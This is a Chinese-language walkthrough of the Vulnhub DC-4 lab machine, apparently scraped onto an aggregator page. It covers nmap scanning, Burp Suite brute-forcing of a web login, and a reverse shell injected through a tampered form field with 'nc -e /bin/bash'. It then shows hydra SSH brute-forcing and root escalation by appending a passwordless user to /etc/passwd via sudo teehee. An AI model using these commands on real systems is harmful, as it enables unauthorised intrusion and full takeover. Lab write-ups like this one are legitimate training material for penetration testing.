当前位置: 首页 > news >正文

VulhubDC-4靶机详解

项目地址

https://download.vulnhub.com/dc/DC-4.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统,端口及对应服务

nmap -A -p- 192.168.47.145

发现开放22和80端口

访问http://192.168.47.145

发现是个登录界面

尝试使用BP抓包进行爆破

发送到Intruder模块

载入密码字典,开始攻击

对lenth进行排序,发现一个长度异常单位

使用这个密码尝试登录

登录成功

漏洞利用

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包

发现radio可以修改

设置监听
nc -lvvp 8888

反弹shell

注意原数据包空格用+代替的,所以我们也用+来代替

nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功

获得交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

提权

四处翻翻

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中

使用hydra命令进行爆破
hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145

爆破出来密码是jibril04

使用ssh连接

连接成功

尝试查看刚才没权限的那个文件
cat /home/jim/mbox

看上去像是收到一封邮件

去var/mail找找
cat /var/mail/jim

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户

登录成功

查看权限

发现charles有teehee命令的权限

使用teehee创建一个root用户
echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

添加成功

切换账户

发现flag.txt在/root目录下

查看flag

http://www.lryc.cn/news/440696.html

相关文章:

  • [数据集][目标检测]烟叶病害检测数据集VOC+YOLO格式612张3类别
  • Sapiens——人类视觉大模型的基础
  • 《深度学习》【项目】 OpenCV 身份证号识别
  • 机器学习实战—天猫用户重复购买预测
  • 一款rust语言AI神器cursor在ubuntu环境下的安装启动教程
  • 【C#生态园】发现C#中的数据科学魔法:6款不可错过的库详解
  • 导入neo4j数据CSV文件及csv整理demo示例
  • bug | pycharm社区版无sciview解决办法
  • PL/SQL程序设计入门
  • 一、Numpy入门
  • 自动化测试框架设计核心理念——关键字驱动
  • GO GIN SSE DEMO
  • GEE教程:1950-2023年ECMWF数据中积雪的长时序统计分析
  • 【React Native】路由和导航
  • Linux环境基础开发工具---vim
  • python AssertionError: Torch not compiled with CUDA enabled
  • Pandas的入门操作-Series对象
  • 自然语言处理系列六十八》搜索引擎项目实战》搜索引擎系统架构设计
  • H5依赖安装
  • MatchRFG:引领MemeCoin潮流,探索无限增长潜力
  • 2024/9/18 模型的存储与读取
  • 在 fnOS上安装 KVM 虚拟化,并使用 Cockpit 网页管理虚拟机
  • VUE实现刻度尺进度条
  • ZYNQ FPGA自学笔记~点亮LED
  • 攻击者如何在日常网络资源中隐藏恶意软件
  • 《深度学习》深度学习 框架、流程解析、动态展示及推导
  • “中秋快乐”文字横幅的MATLAB代码生成
  • 【Node.js】RabbitMQ 延时消息
  • 前后端分离Vue美容店会员信息管理系统o7grs
  • 初学Linux(学习笔记)